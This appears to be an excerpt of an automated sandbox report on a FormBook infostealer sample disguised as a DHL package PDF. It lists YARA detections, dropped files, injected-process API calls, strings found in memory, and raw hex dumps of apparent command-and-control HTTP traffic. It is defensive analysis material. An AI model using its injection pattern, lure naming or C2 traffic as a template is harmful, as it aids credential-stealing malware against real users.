61 41 53 6b 44 72 30 6d 36 64 41 67 42 4e 49 62 6b 72 63 2d 35 4c 49 6b 32 78 70 70 39 70 75 52 4d 76 47 70 37 4d 41 50 67 4c 4d 34 31 55 33 59 45 68 5a 5a 35 51 4f 52 36 52 62 4f 57 4b 62 32 4d 62 4a 36 53 75 33 54 74 6e 4e 43 56 6f 34 69 61 39 53 51 78 38 58 70 38 59 6f 54 57 43 79 6d 6a 7a 54 33 75 61 65 76 68 6c 30 2d 4f 33 71 51 6a 4d 69 67 47 64 6c 41 75 68 69 5f 42 47 6c 54 68 30 57 4f 63 72 71 79 70 37 59 51 6d 41 35 66 43 38 4d 56 49 42 49 36 53 45 7a 79 63 58 75 44 4d 5f 31 77 51 64 73 77 75 33 77 49 47 46 6a 63 63 77 4c 6d 6d 37 6f 42 43 78 32 38 35 54 62 6a 42 63 50 2d 28 45 58 33 77 4c 54 76 46 4c 64 45 66 37 4e 5a 4e 65 74 54 67 66 71 75 68 6e 4a 65 61 72 6d 6f 66 4d 39 72 59 6e 4a 4b 53 47 74 63 71 57 5a 56 38 43 75 36 67 44 71 30 4e 6d 30 30 59 66 52 74 64 47 79 63 56 4d 4d 39 7a 73 47 61 56 66 57 4b 56 30 78 39 61 63 73 39 37 35 41 59 4e 54 4c 7a 52 42 72 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: FrJd4PG=6iiorvPF1JSbLB79NOIGTMZMfaUs9pGmXf8k~_JhN33LjpjU(Q~ssP~gwDHDakLHENqYjsheZm2Xf-xcndJ0wzMpDXeZ5x5Rval0OBuAa4aASkDr0m6dAgBNIbkrc-5LIk2xpp9puRMvGp7MAPgLM41U3YEhZZ5QOR6RbOWKb2MbJ6Su3TtnNCVo4ia9SQx8Xp8YoTWCymjzT3uaevhl0-O3qQjMigGdlAuhi_BGlTh0WOcrqyp7YQmA5fC8MVIBI6SEzycXuDM_1wQdswu3wIGFjccwLmm7oBCx285TbjBcP-(EX3wLTvFLdEf7NZNetTgfquhnJearmofM9rYnJKSGtcqWZV8Cu6gDq0Nm00YfRtdGycVMM9zsGaVfWKV0x9acs975AYNTLzRBrw).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Sep 2020 16:41:19 GMTServer: ApacheX-Powered-By: PHP/7.2.33Vary: Accept-Encoding,CookieExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://orchidinvestmentlimited.com/wp-json/>; rel="https://api.w.org/"X-TEC-API-VERSION: v1X-TEC-API-ROOT: https://orchidinvestmentlimited.com/wp-json/tribe/events/v1/X-TEC-API-ORIGIN: https://orchidinvestmentlimited.comConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4f 72 63 68 69 64 20 49 6e 76 65 73 74 6d 65 6e 74 20 4c 69 6d 69 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6f 72 63 68 69 64 69 6e 76 65 73 74 6d 65 6e 74 6c 69 6d 69 74 65 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4f 72 63 68 69 64 20 49 6e 76 65 73 74 6d 65 6e 74 20 4c 69 6d 69 74 65 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 72 63 68 69 64 69 6e 76 65 73 74 6d 65 6e 74 6c 69 6d 69 74 65 64 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4f 72 63 68 69 64 20 49 6e 76 65 73 74 6d 65 6e 74 20 4c 69 6d 69 74 65 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 72 63 68 69 64 69 6e 76 65 73 74 6d 65 6e 74 6c 69 6d 69 74 Data Ascii: 4000<!doctype html><html lang="en-US"><head><meta charset="U
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: nsc735F.tmp.0.drString found in binary or memory: http://gimp-print.sourceforge.net/xsd/gp.xsd-1.0
          Source: Dhl package - pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Dhl package - pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: nsc735F.tmp.0.drString found in binary or memory: http://postserv.post.gov.tw/webpost/CSController?cmd=POS4001_1
          Source: nsc735F.tmp.0.drString found in binary or memory: http://postserv.post.gov.tw/webpost/CSController?cmd=POS4001_3&amp;MAILNO=
          Source: nsc735F.tmp.0.drString found in binary or memory: http://search.msn.comXWarning:
          Source: wlanext.exe, 00000007.00000002.439737077.00000000032E9000.00000004.00000001.sdmpString found in binary or memory: http://www.3rdimultimedia.com
          Source: wlanext.exe, 00000007.00000002.439737077.00000000032E9000.00000004.00000001.sdmpString found in binary or memory: http://www.3rdimultimedia.com/c232/
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: org.gnome.Shell.Screenshot.xml.0.drString found in binary or memory: http://www.freedesktop.org/standards/dbus/1.0/introspect.dtd
          Source: nsc735F.tmp.0.drString found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: nsc735F.tmp.0.drString found in binary or memory: http://www.mozilla.org/2006/browser/search/
          Source: yukon.xml.0.drString found in binary or memory: http://www.oasis-open.org/docbook/xml/4.3/docbookx.dtd
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.215931643.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: nsc735F.tmp.0.drString found in binary or memory: https://www.amazon.co.uk/
          Source: nsc735F.tmp.0.drString found in binary or memory: https://www.amazon.co.uk/exec/obidos/external-search/
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053CB

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\97LP2175\97Llogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\97LP2175\97Llogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419C90 NtCreateFile,2_2_00419C90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419D40 NtReadFile,2_2_00419D40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419DC0 NtClose,2_2_00419DC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419CE3 NtCreateFile,2_2_00419CE3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419C8B NtCreateFile,2_2_00419C8B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419DBA NtClose,2_2_00419DBA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9540 NtReadFile,LdrInitializeThunk,2_2_053B9540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B95D0 NtClose,LdrInitializeThunk,2_2_053B95D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9710 NtQueryInformationToken,LdrInitializeThunk,2_2_053B9710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_053B97A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9780 NtMapViewOfSection,LdrInitializeThunk,2_2_053B9780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_053B96E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_053B9910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B99A0 NtCreateSection,LdrInitializeThunk,2_2_053B99A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_053B9860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9840 NtDelayExecution,LdrInitializeThunk,2_2_053B9840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A20 NtResumeThread,LdrInitializeThunk,2_2_053B9A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A50 NtCreateFile,LdrInitializeThunk,2_2_053B9A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BAD30 NtSetContextThread,2_2_053BAD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9520 NtWaitForSingleObject,2_2_053B9520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9560 NtWriteFile,2_2_053B9560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B95F0 NtQueryInformationFile,2_2_053B95F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9730 NtQueryVirtualMemory,2_2_053B9730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BA710 NtOpenProcessToken,2_2_053BA710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9770 NtSetInformationFile,2_2_053B9770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BA770 NtOpenThread,2_2_053BA770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9760 NtOpenProcess,2_2_053B9760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9FE0 NtCreateMutant,2_2_053B9FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9610 NtEnumerateValueKey,2_2_053B9610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9670 NtQueryInformationProcess,2_2_053B9670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9660 NtAllocateVirtualMemory,2_2_053B9660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9650 NtQueryValueKey,2_2_053B9650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B96D0 NtCreateKey,2_2_053B96D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9950 NtQueueApcThread,2_2_053B9950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B99D0 NtCreateProcessEx,2_2_053B99D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9820 NtEnumerateKey,2_2_053B9820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BB040 NtSuspendThread,2_2_053BB040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B98A0 NtWriteVirtualMemory,2_2_053B98A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B98F0 NtReadVirtualMemory,2_2_053B98F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9B00 NtSetValueKey,2_2_053B9B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BA3B0 NtGetContextThread,2_2_053BA3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A10 NtQuerySection,2_2_053B9A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A00 NtProtectVirtualMemory,2_2_053B9A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A80 NtOpenDirectoryObject,2_2_053B9A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00D854E0 NtDelayExecution,2_2_00D854E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00D8318C NtWriteVirtualMemory,2_2_00D8318C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A50 NtCreateFile,LdrInitializeThunk,7_2_02CA9A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9B00 NtSetValueKey,LdrInitializeThunk,7_2_02CA9B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9840 NtDelayExecution,LdrInitializeThunk,7_2_02CA9840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_02CA9860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA99A0 NtCreateSection,LdrInitializeThunk,7_2_02CA99A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_02CA9910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA96D0 NtCreateKey,LdrInitializeThunk,7_2_02CA96D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02CA96E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9650 NtQueryValueKey,LdrInitializeThunk,7_2_02CA9650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02CA9660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9610 NtEnumerateValueKey,LdrInitializeThunk,7_2_02CA9610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9FE0 NtCreateMutant,LdrInitializeThunk,7_2_02CA9FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9780 NtMapViewOfSection,LdrInitializeThunk,7_2_02CA9780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9770 NtSetInformationFile,LdrInitializeThunk,7_2_02CA9770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9710 NtQueryInformationToken,LdrInitializeThunk,7_2_02CA9710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA95D0 NtClose,LdrInitializeThunk,7_2_02CA95D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9540 NtReadFile,LdrInitializeThunk,7_2_02CA9540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9560 NtWriteFile,LdrInitializeThunk,7_2_02CA9560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A80 NtOpenDirectoryObject,7_2_02CA9A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A00 NtProtectVirtualMemory,7_2_02CA9A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A10 NtQuerySection,7_2_02CA9A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A20 NtResumeThread,7_2_02CA9A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAA3B0 NtGetContextThread,7_2_02CAA3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA98F0 NtReadVirtualMemory,7_2_02CA98F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA98A0 NtWriteVirtualMemory,7_2_02CA98A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAB040 NtSuspendThread,7_2_02CAB040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9820 NtEnumerateKey,7_2_02CA9820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA99D0 NtCreateProcessEx,7_2_02CA99D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9950 NtQueueApcThread,7_2_02CA9950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9670 NtQueryInformationProcess,7_2_02CA9670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA97A0 NtUnmapViewOfSection,7_2_02CA97A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9760 NtOpenProcess,7_2_02CA9760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAA770 NtOpenThread,7_2_02CAA770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAA710 NtOpenProcessToken,7_2_02CAA710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9730 NtQueryVirtualMemory,7_2_02CA9730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA95F0 NtQueryInformationFile,7_2_02CA95F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9520 NtWaitForSingleObject,7_2_02CA9520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAAD30 NtSetContextThread,7_2_02CAAD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619E70 NtAllocateVirtualMemory,7_2_02619E70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619C90 NtCreateFile,7_2_02619C90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619D40 NtReadFile,7_2_02619D40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619DC0 NtClose,7_2_02619DC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619CE3 NtCreateFile,7_2_02619CE3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619C8B NtCreateFile,7_2_02619C8B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619DBA NtClose,7_2_02619DBA
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_004069430_2_00406943
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_0040711A0_2_0040711A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041D0282_2_0041D028
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041D8D12_2_0041D8D1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041BD622_2_0041BD62
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409E2C2_2_00409E2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409E302_2_00409E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041E72D2_2_0041E72D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05441D552_2_05441D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05370D202_2_05370D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05396E302_2_05396E30
